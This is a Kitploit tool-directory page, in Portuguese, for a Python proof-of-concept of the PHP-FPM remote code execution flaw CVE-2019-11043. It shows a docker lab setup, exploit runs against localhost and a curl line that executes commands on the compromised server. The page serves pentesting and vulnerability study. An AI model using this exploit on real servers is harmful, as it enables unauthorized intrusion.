Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2019-11043 — (PoC) Versão em Python do exploit CVE-2019-11043 por neex | Kitploit
Ferramentas/GitHubGitHub/themiddleblue/cve-2019-11043
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed TeamingDesenvolvimento de Payloads
GitHubthemiddleblue/cve-2019-11043

CVE-2019-11043

(PoC) Versão em Python do exploit CVE-2019-11043 por neex

Ver Repositório
14645há 6 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

PoC CVE-2019-11043

Uma versão em Python do exploit CVE-2019-11043 https://github.com/neex/phuip-fpizdam
Este PoC ainda é um rascunho; use o exploit escrito por @neex
Análise da vulnerabilidade: https://paper.seebug.org/1064/

Configuração do PoC

Basta executar o docker compose para subir o nginx e o php-fpm:

root@kitploit:~
# docker-compose up -d
Creating network "cve-2019-11043-git_app_net" with driver "bridge"
Creating php   ... done
Creating nginx ... done

Se quiser ler os logs do php-fpm, você pode executar:

root@kitploit:~
docker logs --tail 10 --follow php

Exploit

root@kitploit:~
# python3 exploit.py --url http://localhost/index.php
[*] QSL candidate: 1752, 1757, 1762
[*] Target seems vulnerable: PHPSESSID=05b156ea034b903de6624f09c513541c; path=/
[*] RCE successfully exploited!

    You should be able to run commands using:
    curl http://localhost/index.php?a=bin/ls+/

Se quiser verificar apenas a vulnerabilidade, sem executar o exploit:

root@kitploit:~
python3 exploit.py --url http://localhost/index.php --skip-rce
#...
python3 exploit.py --url http://localhost/index.php --reset

Você pode tentar matar o processo php-fpm e redefinir todas as configurações PHP injetadas com --reset:

root@kitploit:~
python3 exploit.py --url http://localhost/index.php --reset

Vídeo PoC

https://twitter.com/Menin_TheMiddle/status/1188776386569355265

Baixar ferramenta